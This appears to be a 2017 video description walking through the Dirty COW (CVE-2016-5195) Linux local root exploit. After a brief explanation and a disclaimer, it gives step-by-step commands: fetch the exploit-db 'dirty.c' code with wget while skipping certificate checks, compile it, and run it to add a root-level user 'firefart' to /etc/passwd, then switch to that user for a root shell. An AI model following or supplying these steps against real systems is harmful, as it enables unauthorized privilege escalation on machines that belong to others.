Kernel Dirty COW local root exploit Demonstration
iSpeech
This video intended for educational purpose and awareness of serious bug(Dirty Cow) in Linux kernel with tech geeks and linux enthusiastic people.
If anyone using this attack for any serious harm I'll not be responsible for it .
##### Local Privilege Escalation #####
1. Hi Guys , Today we are discussing about Local Privilege Escalation using Dirty COW bug in Linux Kernel version "2.6.22 to 3.9"
2. What is This Attack means ??
A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
-----------------------------------------------------------------------------
Kernel Local Privilege Escalation "Dirty COW" - CVE-2016-5195
https://access.redhat.com/security/vulnerabilities/DirtyCow
Linux Kernel 2.6.22 to 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)
https://www.exploit-db.com/exploits/40839/
------------------------------------------------------------------------------
3. You can download script to check vulnerability in Linux kernel from above RedHat portal using below command.
$wget 'https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh'
4. Run above script to check vulnerability in Linux kernel.
$bash rh-cve-2016-5195_5.sh
5. Above output shows that your kernel version is vulnerable. So, now we're going to escalate normal user to Root user privilage using a simple "C code"
6. Download "dirty.c" from below URL:-
$wget --no-check-certificate 'https://www.exploit-db.com/download/40839' -O 'dirty.c'
now need to compile this code using gcc compiler which is by default compiler in every linux system.
7. To compile code using gcc:-
$gcc -pthread dirty.c -o dirty -lcrypt
above command will create an executable file named dirty in current directory.
8. Now start this attack with executing above executable file.
./dirty
it'll put entry for new user 'firefart' with password which you supply during this dirty execution in /etc/passwd and make a backup of passwd file in /tmp/passwd.bak.
9. now you can enter with above user firefart with provided password.
$su - firefart
passwd:- your password
10. [firefart@localhost]#
Bang you got root access of the system.
Thanks for watching this video . I'm a linux enthusiastic to explore new attacks and memory leaks in linux kernel .
So subscribe my channel for more educational video on real attack and exploitation.
I'll share all above links in description below .
Bye Have fun 😉
2017-03-05 16:27:27
source
Gloss